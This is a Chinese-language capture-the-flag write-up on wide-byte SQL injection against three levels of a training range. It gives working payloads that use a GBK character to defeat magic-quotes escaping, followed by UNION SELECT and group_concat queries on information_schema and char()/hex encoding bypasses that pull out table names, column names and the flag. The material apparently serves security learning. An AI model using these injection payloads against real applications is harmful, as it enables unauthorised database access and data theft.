寬字節注入


靶場三關:  使用工具:Burpsuite

http://59.63.200.79:8812/New/WidecharBased/RankOne/sql-one/

http://59.63.200.79:8812/New/WidecharBased/RankTwo/sql-two/

http://59.63.200.79:8812/New/WidecharBased/RankThree/sql-three/

寬字節注入第一關
首先進入靶場,?id=1:


加單引號嘗試是否報錯有SQL注入可能:


發現有反斜線魔術引號存在,使用漢字將反斜線、引號搞掉:?id=1汗’ order by 3 —+:


搞掉並且閉合。
然后按步驟進行:
1、測字段數:order by ,測出字段數為三
2、Union select 1,2,3側回顯點為2,3
3、因為輸出范圍很大,所以使用group_concat()函數輸出結果,測庫名、表名、字段名、flag.


表名:?id=9.999汗’%20%20 union select 1,2,group_concat( table_name ) from information_schema.tables where table_schema=database() —+


字段名:?id=9.999汗’ union select 1,2,group_concat( column_name ) from information_schema.columns where table_name=char(122,107,97,113) —+
此處使用char()函數繞過魔術引號


Flag:?id=9.999汗’%20%20 union select 1,2,group_concat( flag) from%20 zkaq— +


發現這里的表名沒魔術引號
zKaQ:?id=9.999汗’%20%20 union select 1,2,group_concat(zKaQ) from%20 zkaq—+



寬字節注入第二關

和第一題一樣的測試方法:


同樣有魔術引號,但是是雙引號
閉合方法:


其他步驟與第一題類似。

寬字節注入第三關
使用burpsuite 抓包:


引號檢驗測試發現這道題可能是post注入與魔術引號結合的問題。先閉合嘗試


可以閉合
然后繼續post注入的方法:


測出回顯點為1和2.


獲得表名。


16進制繞過魔術引號,獲得字段名


獲得flag.

做以記錄,備忘

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM